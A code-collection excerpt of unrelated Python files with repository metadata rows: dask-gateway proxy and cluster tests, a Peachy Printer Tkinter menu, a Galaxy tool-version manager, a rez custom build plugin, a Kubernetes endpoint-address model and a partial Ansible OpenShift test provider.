    monkeypatch.setenv("http_proxy", "http://alice:password@host:80/path")
    with dask.config.set(gateway__http_client__proxy=False):
        gateway = Gateway("http://myhost:80")
    # No proxy settings should be forwarded to the HTTP client.
    assert gateway._request_kwargs == {"proxy": None, "proxy_auth": None}
def test_http_client_proxy_true(monkeypatch):
    """With proxy=True, proxy settings are inferred from http(s)_proxy env vars."""
    http_proxy = "http://alice:password@host:80/path"
    proxy_sol = yarl.URL("http://host:80/path")
    proxy_auth_sol = aiohttp.BasicAuth("alice", "password")
    with dask.config.set(gateway__http_client__proxy=True):
        with monkeypatch.context() as m:
            # Start from a clean environment (both lower and upper case).
            for k in ["http_proxy", "https_proxy"]:
                m.delenv(k, raising=False)
                m.delenv(k.upper(), raising=False)
            with m.context() as m2:
                m2.setenv("http_proxy", http_proxy)
                # Properly inferred from environment
                g = Gateway("http://myhost:80")
                assert g._request_kwargs["proxy"] == proxy_sol
                assert g._request_kwargs["proxy_auth"] == proxy_auth_sol
                # No HTTPS proxy set
                g = Gateway("https://myhost:80")
                assert g._request_kwargs == {"proxy": None, "proxy_auth": None}
            # No HTTP proxy set
            g = Gateway("http://myhost:80")
            assert g._request_kwargs == {"proxy": None, "proxy_auth": None}
def test_http_client_proxy_explicit(monkeypatch):
    """An explicit proxy URL in config wins over proxy environment vars."""
    configured_proxy = "http://alice:password@host:80/path"
    expected_url = yarl.URL("http://host:80/path")
    expected_auth = aiohttp.BasicAuth("alice", "password")
    with dask.config.set(gateway__http_client__proxy=configured_proxy):
        with monkeypatch.context() as m:
            # The environment points elsewhere; it must be ignored.
            m.setenv("http_proxy", "http://bob:foobar@otherhost:90/path")
            for scheme in ("http", "https"):
                gateway = Gateway(f"{scheme}://myhost:80")
                kwargs = gateway._request_kwargs
                assert kwargs["proxy"] == expected_url
                assert kwargs["proxy_auth"] == expected_auth
@pytest.mark.asyncio
async def test_get_versions():
    """Client and server report their package versions via get_versions."""
    from dask_gateway_server import __version__ as server_version
    from dask_gateway import __version__ as client_version
    async with temp_gateway() as g:
        async with g.gateway_client() as gateway:
            versions = await gateway.get_versions()
            assert versions["client"]["version"] == client_version
            assert versions["server"]["version"] == server_version
@pytest.mark.asyncio
async def test_client_reprs():
    """repr and _repr_html_ expose the cluster name and dashboard link."""
    async with temp_gateway() as g:
        async with g.gateway_client() as gateway:
            cluster = await gateway.new_cluster()
            # Plain repr
            assert cluster.name in repr(cluster)
            # HTML repr with dashboard
            cluster.dashboard_link = f"{g.address}/clusters/{cluster.name}/status"
            assert cluster.name in cluster._repr_html_()
            assert cluster.dashboard_link in cluster._repr_html_()
            # Client dashboard link
            client = cluster.get_client()
            assert client.dashboard_link == cluster.dashboard_link
            # HTML repr with no dashboard
            cluster.dashboard_link = None
            assert "Not Available" in cluster._repr_html_()
            await cluster.shutdown()
@pytest.mark.asyncio
async def test_cluster_widget():
    """The ipywidgets status widget reflects the current worker count."""
    pytest.importorskip("ipywidgets")
    def test():
        with GatewayCluster(
            address=g.address, proxy_address=g.proxy_address
        ) as cluster:
            # Smoke test widget
            cluster._widget()
            template = "<tr><th>Workers</th> <td>%d</td></tr>"
            assert (template % 0) in cluster._widget_status()
            cluster.scale(1)
            # Poll for up to 30s for the worker to appear in scheduler_info.
            timeout = time.time() + 30
            while time.time() < timeout:
                if cluster.scheduler_info.get("workers"):
                    break
                time.sleep(0.25)
            else:
                assert False, "didn't scale up in time"
            assert (template % 1) in cluster._widget_status()
    async with temp_gateway() as g:
        loop = get_running_loop()
        await loop.run_in_executor(None, test)
@pytest.mark.asyncio
async def test_dashboard_link_from_public_address():
    """Dashboard links are rooted at the configured public address."""
    pytest.importorskip("bokeh")
    async with temp_gateway() as g:
        with dask.config.set(
            gateway__address=g.address,
            gateway__public_address="/services/dask-gateway/",
            gateway__proxy_address=g.proxy_address,
        ):
            async with Gateway(asynchronous=True) as gateway:
                # Trailing slash is normalized away.
                assert gateway._public_address == "/services/dask-gateway"
                cluster = await gateway.new_cluster()
                sol = "/services/dask-gateway/clusters/%s/status" % cluster.name
                assert cluster.dashboard_link == sol
                clusters = await gateway.list_clusters()
                for c in clusters:
                    assert c.dashboard_link.startswith("/services/dask-gateway")
@pytest.mark.asyncio
async def test_create_cluster_with_GatewayCluster_constructor():
    """GatewayCluster() creates a cluster and shuts it down on context exit."""
    async with temp_gateway() as g:
        async with GatewayCluster(
            address=g.address, proxy_address=g.proxy_address, asynchronous=True
        ) as cluster:
            # Cluster is now present in list
            clusters = await cluster.gateway.list_clusters()
            assert len(clusters)
            assert clusters[0].name == cluster.name
            await cluster.scale(1)
            async with cluster.get_client(set_as_default=False) as client:
                res = await client.submit(lambda x: x + 1, 1)
                assert res == 2
        assert cluster.status == "closed"
        async with g.gateway_client() as gateway:
            # No cluster running
            clusters = await gateway.list_clusters()
            assert not clusters
@pytest.mark.asyncio
async def test_sync_constructors():
    """The blocking (non-async) client API works from a worker thread."""
    # `test` closes over `g`, which is bound before the executor call below.
    def test():
        with g.gateway_client(asynchronous=False) as gateway:
            with gateway.new_cluster() as cluster:
                cluster.scale(1)
                client = cluster.get_client()
                res = client.submit(lambda x: x + 1, 1).result()
                assert res == 2
                with gateway.connect(cluster.name) as cluster2:
                    client2 = cluster2.get_client()
                    res = client2.submit(lambda x: x + 1, 1).result()
                    assert res == 2
    async with temp_gateway() as g:
        loop = get_running_loop()
        await loop.run_in_executor(None, test)
@pytest.mark.asyncio
async def test_GatewayCluster_shutdown_on_close():
    """Clusters default to shutdown_on_close and are reaped when dropped."""
    async with temp_gateway() as g:
        def test():
            cluster = GatewayCluster(address=g.address, proxy_address=g.proxy_address)
            assert cluster.shutdown_on_close
            assert cluster in GatewayCluster._instances
        loop = get_running_loop()
        await loop.run_in_executor(None, test)
        # The cluster object went out of scope in the thread; the registry
        # should be empty again and the server-side cluster gone.
        assert len(GatewayCluster._instances) == 0
        async with g.gateway_client() as gateway:
            # No cluster running
            clusters = await gateway.list_clusters()
            assert not clusters
@pytest.mark.asyncio
async def test_GatewayCluster_client_error_doesnt_prevent_cleanup():
    """Check that an error on closing clients doesn't prevent cluster shutdown"""
    async with temp_gateway() as g:
        class BadGatewayCluster(GatewayCluster):
            # Simulate a failure during the async stop path.
            async def _stop_async(self):
                await super()._stop_async()
                raise ValueError("OH NO")
        def test():
            cluster = BadGatewayCluster(
                address=g.address, proxy_address=g.proxy_address
            )
            assert cluster in GatewayCluster._instances
        loop = get_running_loop()
        await loop.run_in_executor(None, test)
        assert len(GatewayCluster._instances) == 0
        async with g.gateway_client() as gateway:
            # No cluster running
            clusters = await gateway.list_clusters()
            assert not clusters
@pytest.mark.asyncio
async def test_GatewayCluster_cleanup_atexit():
    """cleanup_lingering_clusters closes leftover clusters without warnings."""
    async with temp_gateway() as g:
        def test():
            return GatewayCluster(address=g.address, proxy_address=g.proxy_address)
        loop = get_running_loop()
        cluster = await loop.run_in_executor(None, test)
        assert len(GatewayCluster._instances) == 1
        def test_cleanup():
            # No warnings raised by cleanup function
            with pytest.warns(None) as rec:
                cleanup_lingering_clusters()
            for r in rec:
                assert not issubclass(r.category, UserWarning)
            # Cluster is now closed
            assert cluster.status == "closed"
            # No harm in double running
            with pytest.warns(None) as rec:
                cleanup_lingering_clusters()
            for r in rec:
                assert not issubclass(r.category, UserWarning)
        await loop.run_in_executor(None, test_cleanup)
        async with g.gateway_client() as gateway:
            # No cluster running
            clusters = await gateway.list_clusters()
            assert not clusters
| 33.266515 | 86 | 0.617913 |
acfb64747dd03001396595009b4a83b4bbd986fa | 1,293 | py | Python | src/ui/main_ui.py | PeachyPrinter/tkpeachyprinter | d88dcb4891d19c4b81a7f4f072e120d05c02124c | [
"Apache-2.0"
] | 1 | 2017-03-08T02:48:19.000Z | 2017-03-08T02:48:19.000Z | src/ui/main_ui.py | PeachyPrinter/tkpeachyprinter | d88dcb4891d19c4b81a7f4f072e120d05c02124c | [
"Apache-2.0"
] | null | null | null | src/ui/main_ui.py | PeachyPrinter/tkpeachyprinter | d88dcb4891d19c4b81a7f4f072e120d05c02124c | [
"Apache-2.0"
] | 6 | 2016-05-12T04:10:18.000Z | 2020-02-15T09:55:00.000Z | from Tkinter import *
from ui_tools import *
import sys
class MainUI(PeachyFrame):
    """Top-level menu frame: navigation to setup, print, and licence screens."""

    def initialize(self):
        """Build the main-menu widgets and display the version string."""
        self.grid()
        try:
            from VERSION import version
            version = "Peachy Printer Tools (version: %s)" % version
        except ImportError:
            # Narrowed from a bare `except:`. No generated VERSION module
            # (e.g. running from a source checkout) -> development label.
            version = "Peachy Printer Tools (version: %s)" % "DEVELOPMENT"
        Button(self, text=u"Setup Printers", command=self._setup_printers).grid(column=1, row=10, sticky=NSEW)
        Button(self, text=u"Print", command=self._print).grid(column=1, row=20, sticky=NSEW)
        Label(self).grid(column=1, row=30)
        Button(self, text=u"Licence", command=self._licence).grid(column=1, row=40, sticky=NSEW)
        Label(self).grid(column=1, row=50)
        Button(self, text=u"Quit", command=self._quit).grid(column=0, row=60)
        Label(self).grid(column=1, row=70)
        Label(self, text=version).grid(column=2, row=80, sticky=S+E)
        self.update()

    def _setup_printers(self):
        """Navigate to the printer configuration screen."""
        from ui.configuration_ui import SetupUI
        self.navigate(SetupUI)

    def _print(self):
        """Navigate to the print screen."""
        from ui.print_ui import PrintUI
        self.navigate(PrintUI)

    def _licence(self):
        """Navigate to the licence screen."""
        from ui.licence_ui import LicenceUI
        self.navigate(LicenceUI)

    def _quit(self):
        """Exit the application."""
        sys.exit(0)
| 33.153846 | 110 | 0.634184 |
acfb64a4542bc9444977fad53b7dc43e3e936bb8 | 3,218 | py | Python | lib/tool_shed/tools/tool_version_manager.py | rikeshi/galaxy | c536a877e4a9b3d12aa0d00fd4d5e705109a0d0a | [
"CC-BY-3.0"
] | 1,085 | 2015-02-18T16:14:38.000Z | 2022-03-30T23:52:07.000Z | lib/tool_shed/tools/tool_version_manager.py | rikeshi/galaxy | c536a877e4a9b3d12aa0d00fd4d5e705109a0d0a | [
"CC-BY-3.0"
] | 11,253 | 2015-02-18T17:47:32.000Z | 2022-03-31T21:47:03.000Z | lib/tool_shed/tools/tool_version_manager.py | rikeshi/galaxy | c536a877e4a9b3d12aa0d00fd4d5e705109a0d0a | [
"CC-BY-3.0"
] | 1,000 | 2015-02-18T16:18:10.000Z | 2022-03-29T08:22:56.000Z | import logging
from sqlalchemy import and_
from tool_shed.util import hg_util
from tool_shed.util import metadata_util
from tool_shed.util import repository_util
log = logging.getLogger(__name__)
class ToolVersionManager:
    """Queries and lineage walking for installed tool versions.

    Works against the install model's ToolVersion / ToolVersionAssociation
    tables; lineage methods additionally walk a Mercurial repository's
    changelog via ``hg_util``.
    """
    def __init__(self, app):
        # `app` provides install_model (DB session/context) used by queries.
        self.app = app
    def get_tool_version(self, tool_id):
        """Return the ToolVersion row for ``tool_id``, or None."""
        context = self.app.install_model.context
        return context.query(self.app.install_model.ToolVersion) \
                      .filter(self.app.install_model.ToolVersion.table.c.tool_id == tool_id) \
                      .first()
    def get_tool_version_association(self, parent_tool_version, tool_version):
        """
        Return a ToolVersionAssociation if one exists that associates the two
        received tool_versions. This function is called only from Galaxy.
        """
        context = self.app.install_model.context
        return context.query(self.app.install_model.ToolVersionAssociation) \
                      .filter(and_(self.app.install_model.ToolVersionAssociation.table.c.parent_id == parent_tool_version.id,
                                   self.app.install_model.ToolVersionAssociation.table.c.tool_id == tool_version.id)) \
                      .first()
    def get_version_lineage_for_tool(self, repository_id, repository_metadata, guid):
        """
        Return the tool version lineage chain in descendant order for the received
        guid contained in the received repsitory_metadata.tool_versions. This function
        is called only from the Tool Shed.
        """
        repository = repository_util.get_repository_by_id(self.app, repository_id)
        repo = repository.hg_repo
        # Initialize the tool lineage
        version_lineage = [guid]
        # Get all ancestor guids of the received guid.
        current_child_guid = guid
        # Walk changesets newest-first up to this metadata's revision; each
        # revision's tool_versions maps child guid -> parent guid.
        for changeset in hg_util.reversed_upper_bounded_changelog(repo, repository_metadata.changeset_revision):
            ctx = repo[changeset]
            rm = metadata_util.get_repository_metadata_by_changeset_revision(self.app, repository_id, str(ctx))
            if rm:
                parent_guid = rm.tool_versions.get(current_child_guid, None)
                if parent_guid:
                    version_lineage.append(parent_guid)
                    current_child_guid = parent_guid
        # Get all descendant guids of the received guid.
        current_parent_guid = guid
        # Walk the later changesets (up to the repository tip) looking for
        # entries whose parent is the current head of the lineage; each match
        # is prepended so the list stays in descendant order.
        for changeset in hg_util.reversed_lower_upper_bounded_changelog(repo,
                                                                        repository_metadata.changeset_revision,
                                                                        repository.tip()):
            ctx = repo[changeset]
            rm = metadata_util.get_repository_metadata_by_changeset_revision(self.app, repository_id, str(ctx))
            if rm:
                tool_versions = rm.tool_versions
                for child_guid, parent_guid in tool_versions.items():
                    if parent_guid == current_parent_guid:
                        version_lineage.insert(0, child_guid)
                        current_parent_guid = child_guid
                        break
        return version_lineage
| 46.637681 | 125 | 0.635177 |
acfb65f8f8e26ed3f5597cded45cd7675599d5c7 | 348 | py | Python | prepare.py | lolloberga/Capsian-Engine | 086e0fee9392df1642c8199e61e2e24fb6b81e77 | [
"Apache-2.0"
] | 10 | 2020-09-26T15:10:48.000Z | 2022-02-03T19:13:56.000Z | prepare.py | lolloberga/Capsian-Engine | 086e0fee9392df1642c8199e61e2e24fb6b81e77 | [
"Apache-2.0"
] | 2 | 2020-09-29T19:13:50.000Z | 2021-12-24T12:04:29.000Z | prepare.py | lolloberga/Capsian-Engine | 086e0fee9392df1642c8199e61e2e24fb6b81e77 | [
"Apache-2.0"
] | 3 | 2021-03-05T20:14:38.000Z | 2022-01-26T21:34:36.000Z | from os import system
print("Starting Capsian Preparation Tool...")
print("This script will install all the dependencies you need")
# Fixed typo in the prompt ("lcose" -> "close").
input("Press enter to continue or close to terminate ")
# Install each runtime dependency; pyglet is pinned to the version the
# engine is known to work with.
for package in ("pyglet==1.5.6", "PyOpenGL", "pyinstaller"):
    system("pip install " + package)
input("Installation completed!\nPress enter to exit ")
| 26.769231 | 63 | 0.764368 |
acfb668ec545d6bb031bdd72fccf3275f8580f81 | 9,685 | py | Python | src/rezplugins/build_system/custom.py | maxnbk/rez | 762c5cfce17eabde67eb5582498406eb3544daf0 | [
"Apache-2.0"
] | null | null | null | src/rezplugins/build_system/custom.py | maxnbk/rez | 762c5cfce17eabde67eb5582498406eb3544daf0 | [
"Apache-2.0"
] | null | null | null | src/rezplugins/build_system/custom.py | maxnbk/rez | 762c5cfce17eabde67eb5582498406eb3544daf0 | [
"Apache-2.0"
] | 1 | 2020-09-24T08:33:43.000Z | 2020-09-24T08:33:43.000Z | # Copyright Contributors to the Rez project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Package-defined build command
"""
try:
from builtins import str
from builtins import map
except ImportError:
pass
from pipes import quote
import functools
import os.path
import sys
import os
from rez.build_system import BuildSystem
from rez.build_process import BuildType
from rez.utils.execution import create_forwarding_script
from rez.packages import get_developer_package
from rez.resolved_context import ResolvedContext
from rez.exceptions import PackageMetadataError
from rez.utils.colorize import heading, Printer
from rez.utils.logging_ import print_warning
from rez.vendor.six import six
from rez.config import config
basestring = six.string_types[0]
class CustomBuildSystem(BuildSystem):
"""This build system runs the 'build_command' defined in a package.py.
For example, consider the package.py snippet:
build_commands = "bash {root}/build.sh {install}"
This will run the given bash command in the build path - this is typically
located somewhere under the 'build' dir under the root dir containing the
package.py.
The following variables are available for expansion:
* root: The source directory (the one containing the package.py).
* install: 'install' if an install is occurring, or the empty string ('')
otherwise;
* build_path: The build path (this will also be the cwd);
* install_path: Full path to install destination;
* name: Name of the package getting built;
* variant_index: Index of the current variant getting built, or an empty
string ('') if no variants are present.
* version: Package version currently getting built.
"""
    @classmethod
    def name(cls):
        """Return the plugin name used to select this build system ("custom")."""
        return "custom"
@classmethod
def is_valid_root(cls, path, package=None):
if package is None:
try:
package = get_developer_package(path)
except PackageMetadataError:
return False
return (getattr(package, "build_command", None) is not None)
def __init__(self, working_dir, opts=None, package=None, write_build_scripts=False,
verbose=False, build_args=[], child_build_args=[]):
super(CustomBuildSystem, self).__init__(
working_dir,
opts=opts,
package=package,
write_build_scripts=write_build_scripts,
verbose=verbose,
build_args=build_args,
child_build_args=child_build_args)
@classmethod
def bind_cli(cls, parser, group):
"""
Uses a 'parse_build_args.py' file to add options, if found.
"""
try:
with open("./parse_build_args.py") as f:
source = f.read()
except:
return
# detect what extra args have been added
before_args = set(x.dest for x in parser._actions)
try:
exec(source, {"parser": group})
except Exception as e:
print_warning("Error in ./parse_build_args.py: %s" % str(e))
after_args = set(x.dest for x in parser._actions)
extra_args = after_args - before_args
# store extra args onto parser so we can get to it in self.build()
setattr(parser, "_rezbuild_extra_args", list(extra_args))
def build(self, context, variant, build_path, install_path, install=False,
build_type=BuildType.local):
"""Perform the build.
Note that most of the func args aren't used here - that's because this
info is already passed to the custom build command via environment
variables.
"""
ret = {}
if self.write_build_scripts:
# write out the script that places the user in a build env
build_env_script = os.path.join(build_path, "build-env")
create_forwarding_script(build_env_script,
module=("build_system", "custom"),
func_name="_FWD__spawn_build_shell",
working_dir=self.working_dir,
build_path=build_path,
variant_index=variant.index,
install=install,
install_path=install_path)
ret["success"] = True
ret["build_env_script"] = build_env_script
return ret
# get build command
command = self.package.build_command
# False just means no build command
if command is False:
ret["success"] = True
return ret
def expand(txt):
return txt.format(build_path=build_path,
install="install" if install else '',
install_path=install_path,
name=self.package.name,
root=self.package.root,
variant_index=variant.index if variant.index is not None else '',
version=self.package.version).strip()
if isinstance(command, basestring):
if self.build_args:
command = command + ' ' + ' '.join(map(quote, self.build_args))
command = expand(command)
cmd_str = command
else: # list
command = command + self.build_args
command = list(map(expand, command))
cmd_str = ' '.join(map(quote, command))
if self.verbose:
pr = Printer(sys.stdout)
pr("Running build command: %s" % cmd_str, heading)
# run the build command
post_actions_callback = functools.partial(
self.add_pre_build_commands,
variant=variant,
build_type=build_type,
install=install,
build_path=build_path,
install_path=install_path
)
def _actions_callback(executor):
self._add_build_actions(
executor,
context=context,
package=self.package,
variant=variant,
build_type=build_type,
install=install,
build_path=build_path,
install_path=install_path
)
if self.opts:
# write args defined in ./parse_build_args.py out as env vars
extra_args = getattr(self.opts.parser, "_rezbuild_extra_args", [])
for key, value in list(vars(self.opts).items()):
if key in extra_args:
varname = "__PARSE_ARG_%s" % key.upper()
# do some value conversions
if isinstance(value, bool):
value = 1 if value else 0
elif isinstance(value, (list, tuple)):
value = list(map(str, value))
value = list(map(quote, value))
value = ' '.join(value)
executor.env[varname] = value
retcode, _, _ = context.execute_shell(
command=command,
block=True,
cwd=build_path,
actions_callback=_actions_callback,
post_actions_callback=post_actions_callback
)
ret["success"] = (not retcode)
return ret
@classmethod
def _add_build_actions(cls, executor, context, package, variant,
build_type, install, build_path, install_path=None):
cls.add_standard_build_actions(
executor=executor,
context=context,
variant=variant,
build_type=build_type,
install=install,
build_path=build_path,
install_path=install_path
)
def _FWD__spawn_build_shell(working_dir, build_path, variant_index, install,
                            install_path=None):
    """Forwarding-script entry point that drops the user into a build shell.

    Invoked via the 'build-env' script that CustomBuildSystem.build() writes
    when write_build_scripts is enabled.

    Args:
        working_dir: Source directory containing the package.py.
        build_path: Build directory holding the saved 'build.rxt' context.
        variant_index: Index of the variant to build.
        install: Whether an install is occurring.
        install_path: Full path to install destination, if any.

    Exits the process with the shell's return code.
    """
    # This spawns a shell that the user can run the build command in directly
    context = ResolvedContext.load(os.path.join(build_path, "build.rxt"))
    package = get_developer_package(working_dir)
    variant = package.get_variant(variant_index)
    config.override("prompt", "BUILD>")
    # Same action callbacks the normal build path uses, so the interactive
    # shell sees the same build environment as CustomBuildSystem.build().
    actions_callback = functools.partial(
        CustomBuildSystem._add_build_actions,
        context=context,
        package=package,
        variant=variant,
        build_type=BuildType.local,
        install=install,
        build_path=build_path,
        install_path=install_path
    )
    post_actions_callback = functools.partial(
        CustomBuildSystem.add_pre_build_commands,
        variant=variant,
        build_type=BuildType.local,
        install=install,
        build_path=build_path,
        install_path=install_path
    )
    # NOTE(review): unlike build(), no 'command' is passed here — presumably
    # execute_shell opens an interactive shell in that case; confirm against
    # ResolvedContext.execute_shell.
    retcode, _, _ = context.execute_shell(
        block=True,
        cwd=build_path,
        actions_callback=actions_callback,
        post_actions_callback=post_actions_callback
    )
    sys.exit(retcode)
def register_plugin():
    """Expose this module's build system class to the rez plugin manager."""
    return CustomBuildSystem
| 34.466192 | 95 | 0.601859 |
acfb66d8094d0eba35d6b8abdb68fdfce658c1cf | 5,993 | py | Python | kubernetes/client/models/v1_endpoint_address.py | reymont/python | 02a3a31c630c305527b328af49724f348fbdae15 | [
"Apache-2.0"
] | 1 | 2018-10-20T19:37:57.000Z | 2018-10-20T19:37:57.000Z | kubernetes/client/models/v1_endpoint_address.py | reymont/python | 02a3a31c630c305527b328af49724f348fbdae15 | [
"Apache-2.0"
] | null | null | null | kubernetes/client/models/v1_endpoint_address.py | reymont/python | 02a3a31c630c305527b328af49724f348fbdae15 | [
"Apache-2.0"
] | 2 | 2018-07-27T19:39:34.000Z | 2020-12-25T02:48:27.000Z | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.11.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1EndpointAddress(object):
    """
    NOTE: This class is auto generated by the swagger code generator program.
    Do not edit the class manually.

    Attributes:
        swagger_types (dict): The key is attribute name
            and the value is attribute type.
        attribute_map (dict): The key is attribute name
            and the value is json key in definition.
    """
    swagger_types = {
        'hostname': 'str',
        'ip': 'str',
        'node_name': 'str',
        'target_ref': 'V1ObjectReference'
    }
    attribute_map = {
        'hostname': 'hostname',
        'ip': 'ip',
        'node_name': 'nodeName',
        'target_ref': 'targetRef'
    }

    def __init__(self, hostname=None, ip=None, node_name=None, target_ref=None):
        """V1EndpointAddress - a model defined in Swagger."""
        self._hostname = None
        self._ip = None
        self._node_name = None
        self._target_ref = None
        self.discriminator = None
        # Optional fields are assigned only when provided; 'ip' is required
        # and its setter rejects None.
        if hostname is not None:
            self.hostname = hostname
        self.ip = ip
        if node_name is not None:
            self.node_name = node_name
        if target_ref is not None:
            self.target_ref = target_ref

    @property
    def hostname(self):
        """str: The Hostname of this endpoint."""
        return self._hostname

    @hostname.setter
    def hostname(self, hostname):
        self._hostname = hostname

    @property
    def ip(self):
        """str: The IP of this endpoint. May not be loopback (127.0.0.0/8),
        link-local (169.254.0.0/16), or link-local multicast ((224.0.0.0/24).
        IPv6 is also accepted but not fully supported on all platforms.
        """
        return self._ip

    @ip.setter
    def ip(self, ip):
        # Required field: reject None explicitly.
        if ip is None:
            raise ValueError("Invalid value for `ip`, must not be `None`")
        self._ip = ip

    @property
    def node_name(self):
        """str: Optional node hosting this endpoint. Can be used to determine
        endpoints local to a node."""
        return self._node_name

    @node_name.setter
    def node_name(self, node_name):
        self._node_name = node_name

    @property
    def target_ref(self):
        """V1ObjectReference: Reference to object providing the endpoint."""
        return self._target_ref

    @target_ref.setter
    def target_ref(self, target_ref):
        self._target_ref = target_ref

    def to_dict(self):
        """Returns the model properties as a dict."""
        result = {}
        for attr in self.swagger_types:
            value = getattr(self, attr)
            if isinstance(value, list):
                # Convert model elements; pass plain values through.
                result[attr] = [
                    item.to_dict() if hasattr(item, "to_dict") else item
                    for item in value
                ]
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = {
                    key: val.to_dict() if hasattr(val, "to_dict") else val
                    for key, val in value.items()
                }
            else:
                result[attr] = value
        return result

    def to_str(self):
        """Returns the string representation of the model."""
        return pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`."""
        return self.to_str()

    def __eq__(self, other):
        """Returns true if both objects are equal."""
        return isinstance(other, V1EndpointAddress) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        """Returns true if both objects are not equal."""
        return not self == other
| 28.268868 | 275 | 0.579843 |
acfb6758d861a7bacaa582d530693ee1f07ca52a | 7,381 | py | Python | test/runner/lib/cloud/openshift.py | Container-Projects/ansible-provider-docs | 100b695b0b0c4d8d08af362069557ffc735d0d7e | [
"PSF-2.0",
"BSD-2-Clause",
"MIT"
] | 37 | 2017-08-15T15:02:43.000Z | 2021-07-23T03:44:31.000Z | test/runner/lib/cloud/openshift.py | Container-Projects/ansible-provider-docs | 100b695b0b0c4d8d08af362069557ffc735d0d7e | [
"PSF-2.0",
"BSD-2-Clause",
"MIT"
] | 12 | 2018-01-10T05:25:25.000Z | 2021-11-28T06:55:48.000Z | test/runner/lib/cloud/openshift.py | Container-Projects/ansible-provider-docs | 100b695b0b0c4d8d08af362069557ffc735d0d7e | [
"PSF-2.0",
"BSD-2-Clause",
"MIT"
] | 49 | 2017-08-15T09:52:13.000Z | 2022-03-21T17:11:54.000Z | """OpenShift plugin for integration tests."""
from __future__ import absolute_import, print_function
import json
import os
import re
import time
from lib.cloud import (
CloudProvider,
CloudEnvironment,
)
from lib.util import (
find_executable,
ApplicationError,
display,
SubprocessError,
)
from lib.http import (
HttpClient,
)
from lib.docker_util import (
docker_exec,
docker_run,
docker_rm,
docker_inspect,
docker_pull,
docker_network_inspect,
get_docker_container_id,
)
class OpenShiftCloudProvider(CloudProvider):
    """OpenShift cloud provider plugin. Sets up cloud resources before delegation."""
    DOCKER_CONTAINER_NAME = 'openshift-origin'
    def __init__(self, args):
        """
        :type args: TestConfig
        """
        super(OpenShiftCloudProvider, self).__init__(args, config_extension='.kubeconfig')
        # The image must be pinned to a specific version to guarantee CI passes with the version used.
        self.image = 'openshift/origin:v3.7.1'
        self.container_name = ''
    def filter(self, targets, exclude):
        """Filter out the cloud tests when the necessary config and resources are not available.
        :type targets: tuple[TestTarget]
        :type exclude: list[str]
        """
        # A static config file or a usable docker binary is enough to run.
        if os.path.isfile(self.config_static_path):
            return
        docker = find_executable('docker', required=False)
        if docker:
            return
        skip = 'cloud/%s/' % self.platform
        skipped = [target.name for target in targets if skip in target.aliases]
        if skipped:
            exclude.append(skip)
            display.warning('Excluding tests marked "%s" which require the "docker" command or config (see "%s"): %s'
                            % (skip.rstrip('/'), self.config_template_path, ', '.join(skipped)))
    def setup(self):
        """Setup the cloud resource before delegation and register a cleanup callback."""
        super(OpenShiftCloudProvider, self).setup()
        if self._use_static_config():
            self._setup_static()
        else:
            self._setup_dynamic()
    def get_remote_ssh_options(self):
        """Get any additional options needed when delegating tests to a remote instance via SSH.
        :rtype: list[str]
        """
        # Reverse-tunnel the local OpenShift port to the remote instance.
        if self.managed:
            return ['-R', '8443:localhost:8443']
        return []
    def get_docker_run_options(self):
        """Get any additional options needed when delegating tests to a docker container.
        :rtype: list[str]
        """
        if self.managed:
            return ['--link', self.DOCKER_CONTAINER_NAME]
        return []
    def cleanup(self):
        """Clean up the cloud resource and any temporary configuration files after tests complete."""
        if self.container_name:
            docker_rm(self.args, self.container_name)
        super(OpenShiftCloudProvider, self).cleanup()
    def _setup_static(self):
        """Configure OpenShift tests for use with static configuration."""
        with open(self.config_static_path, 'r') as config_fd:
            config = config_fd.read()
        # Pull the API server URL out of the kubeconfig so availability can be checked.
        match = re.search(r'^ *server: (?P<server>.*)$', config, flags=re.MULTILINE)
        if match:
            endpoint = match.group('server')
            self._wait_for_service(endpoint)
        else:
            display.warning('Could not find OpenShift endpoint in kubeconfig. Skipping check for OpenShift service availability.')
    def _setup_dynamic(self):
        """Create an OpenShift container using docker."""
        self.container_name = self.DOCKER_CONTAINER_NAME
        results = docker_inspect(self.args, self.container_name)
        # A stopped leftover container is removed and recreated.
        if results and not results[0]['State']['Running']:
            docker_rm(self.args, self.container_name)
            results = []
        if results:
            display.info('Using the existing OpenShift docker container.', verbosity=1)
        else:
            display.info('Starting a new OpenShift docker container.', verbosity=1)
            docker_pull(self.args, self.image)
            cmd = ['start', 'master', '--listen', 'https://0.0.0.0:8443']
            docker_run(self.args, self.image, ['-d', '-p', '8443:8443', '--name', self.container_name], cmd)
        container_id = get_docker_container_id()
        if container_id:
            display.info('Running in docker container: %s' % container_id, verbosity=1)
            host = self._get_container_address()
            display.info('Found OpenShift container address: %s' % host, verbosity=1)
        else:
            host = 'localhost'
        port = 8443
        endpoint = 'https://%s:%s/' % (host, port)
        self._wait_for_service(endpoint)
        if self.args.explain:
            config = '# Unknown'
        else:
            if self.args.docker:
                host = self.DOCKER_CONTAINER_NAME
            server = 'https://%s:%s' % (host, port)
            config = self._get_config(server)
        self._write_config(config)
    def _get_container_address(self):
        """Return the bridge-network IPv4 address of the OpenShift container (without the /prefix suffix)."""
        networks = docker_network_inspect(self.args, 'bridge')
        try:
            bridge = [network for network in networks if network['Name'] == 'bridge'][0]
            containers = bridge['Containers']
            container = [containers[container] for container in containers if containers[container]['Name'] == self.DOCKER_CONTAINER_NAME][0]
            return re.sub(r'/[0-9]+$', '', container['IPv4Address'])
        except Exception:
            display.error('Failed to process the following docker network inspect output:\n%s' %
                          json.dumps(networks, indent=4, sort_keys=True))
            raise
    def _wait_for_service(self, endpoint):
        """Wait for the OpenShift service endpoint to accept connections.
        :type endpoint: str
        """
        if self.args.explain:
            return
        client = HttpClient(self.args, always=True, insecure=True)
        # Fix: removed the no-op 'endpoint = endpoint' self-assignment.
        # Poll up to 29 times, 10 seconds apart, before giving up.
        for dummy in range(1, 30):
